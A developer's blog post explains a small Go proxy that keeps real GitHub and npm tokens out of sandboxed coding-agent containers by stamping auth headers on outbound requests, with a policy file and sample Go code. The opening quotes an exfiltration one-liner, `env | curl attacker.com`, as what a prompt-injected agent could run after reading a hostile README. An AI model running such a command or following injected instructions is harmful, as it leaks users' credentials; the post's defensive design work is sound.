# My coding agents run with zero secrets (and they don't even know)

I run Claude Code and Codex in yolo mode. `--dangerously-skip-permissions`, the whole thing. Which is great until you remember prompt injection is real and one cursed README could make the agent go `env | curl attacker.com` and yeet my GitHub token into the void.

So I fixed it. No paid sandbox product, no platform. One small Go proxy and one idea stolen from the big kids: **the agent never holds a real credential. Ever.**

The result is [yagop/sandbox](https://github.com/yagop/sandbox).

## The trick

![](https://cdn.hashnode.com/uploads/covers/6420a2e7bdbe7d697133c86c/6c605bc6-7d5b-4921-8641-eebbc0a0ae8d.png)

The agent lives on an internal Docker network. It literally cannot reach the internet. Its only way out is the proxy, which holds my actual `GH_TOKEN` and `NPM_TOKEN` and stamps the right `Authorization` header onto each request as it leaves.

Inside the container? `GH_TOKEN=dummy`. An npm token that says `dummy`. Git remotes rewritten from SSH to HTTPS so there is not even a key file to steal. The agent thinks it is authenticated (it is!) but if it gets prompt-injected and tries to exfiltrate its secrets, there is nothing to grab. You cannot leak what you never had. Iconic behavior honestly.

## The whole policy is a lil JSON file

```json
{
  "rules": [
    { "host": "api.github.com", "header": "Authorization", "value": "Bearer ${GH_TOKEN}" },
    { "host": "github.com", "header": "Authorization", "value": "Basic ${GH_BASIC}" },
    { "host": "registry.npmjs.org", "header": "Authorization", "value": "Bearer ${NPM_TOKEN}" }
  ]
}
```

Secrets are resolved by name from the environment when the proxy starts, so `proxy up` grabs a fresh `gh auth token` and `proxy reload` rotates them without restarting anything. They never appear in the config, the command line, or the sandbox.
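As an added illustration (my code, not code from yagop/sandbox), here is the core of such a proxy in Go: `resolve` expands the `${NAME}` placeholders from the proxy's own environment once at startup and refuses to start with an unset secret, and `stamp` overwrites the agent's dummy `Authorization` header only when the request host exactly matches a rule. The function names, the exact-host matching and the fail-closed behaviour are my assumptions about how the real proxy behaves.

```go
package main

import (
	"fmt"
	"net/http"
	"os"
	"strings"
)

// Rule mirrors one entry in the policy JSON; ${NAME} in Value names a secret.
type Rule struct {
	Host, Header, Value string
}

// resolve expands ${NAME} in place via lookup (os.LookupEnv in the proxy), so the
// secret lives only in the proxy process; an unset name is an error, not an empty header.
func resolve(rules []Rule, lookup func(string) (string, bool)) ([]Rule, error) {
	for i, r := range rules {
		var missing string
		rules[i].Value = os.Expand(r.Value, func(name string) string {
			v, ok := lookup(name)
			if !ok {
				missing = name
			}
			return v
		})
		if missing != "" {
			return nil, fmt.Errorf("rule for %s: secret %s is not set", r.Host, missing)
		}
	}
	return rules, nil
}

// stamp replaces whatever the sandbox sent ("Bearer dummy") with the real value,
// but only for an exact host match; it reports whether any rule fired.
func stamp(req *http.Request, rules []Rule) bool {
	host := req.URL.Hostname() // drops any :port, so api.github.com:443 still matches
	for _, r := range rules {
		if strings.EqualFold(host, r.Host) {
			req.Header.Set(r.Header, r.Value)
			return true
		}
	}
	return false
}
```

Call `resolve(rules, os.LookupEnv)` once at `proxy up` (and again on `proxy reload`), then `stamp` in the outbound request hook; a request to a host with no rule keeps the agent's `dummy` header and simply goes out unauthenticated.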

## Do you need a product for this?

Slicer, Docker Sandboxes, and Infisical's agent-vault all ship this exact pattern, and they are genuinely good, especially agent-vault if you need per-agent scoping or a team setup. But for one dev on one laptop? It is a few hundred lines of Go and a JSON file.

Tokens stay home. Agents stay feral. Everybody wins.
